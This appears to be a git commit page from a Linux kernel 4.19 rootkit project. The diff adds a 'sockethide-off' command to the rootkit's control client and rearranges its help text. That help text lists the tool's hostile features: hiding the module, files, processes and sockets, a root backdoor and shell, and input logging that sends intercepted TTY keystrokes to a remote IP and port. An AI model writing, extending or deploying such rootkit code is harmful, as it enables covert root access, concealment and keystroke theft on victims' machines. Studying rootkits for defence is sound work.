
Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
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commit e7ca4b8f93a447d2addcaed2a8f87978f421f50b
parent e7ca2836e27e50b88835eb8b54b46e2890735c41
Author: deurzen <>
Date:   Sun, 13 Dec 2020 01:25:32 +0100

adds sockethide disabling command

Msrc/rkctl/rkctl.c | 8++++++--
1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c @@ -118,6 +118,9 @@ parse_input(int argc, char **argv) } } + if (ARGVCMP(1, "sockethide-off")) + return (cmd_t){ handle_tcphide, (void *)0 }; + if (ARGVCMP(1, "backdoor")) { ASSERT_ARGC(2, "backdoor <execve_command>"); return (cmd_t){ handle_backdoor, (void *)argv[2] }; @@ -263,12 +266,13 @@ help() printf("%-38s %s\n", "modhide <on | off>", "{,un}hide rootkit module"); printf("%-38s %s\n", "filehide [open] <toggle | on | off>", "{,un}hide [open] files"); printf("%-38s %s\n", "hidepid <add | rm> <PID>", "{,un}hide a process"); + printf("%-38s %s\n", "socket hide <tcp | udp> <port>", "hide a tcp or udp with the given port"); + printf("%-38s %s\n", "socket unhide <tcp | udp> <port>", "unhide a tcp or udp with the given port"); + printf("%-38s %s\n", "sockethide-off", "disable any (tcp or udp) socket hiding"); printf("%-38s %s\n", "backdoor <execve_command>", "exec a command as root"); printf("%-38s %s\n", "shell", "obtain a shell as root"); printf("%-38s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or TTY (1)"); printf("%-38s %s\n", "backdoor-off", "disable any (read or tty) backdoor"); - printf("%-38s %s\n", "socket hide <tcp|udp> <port>", "hide a tcp or udp with the given port"); - printf("%-38s %s\n", "socket unhide <tcp|udp> <port>", "unhide a tcp or udp with the given port"); printf("%-38s %s\n", "inputlogging <ip> <port>", "intercept {P,T}TY input and send it to <ip>:<port>"); printf("%-38s %s\n", "inputlogging-off", "disable input logging"); }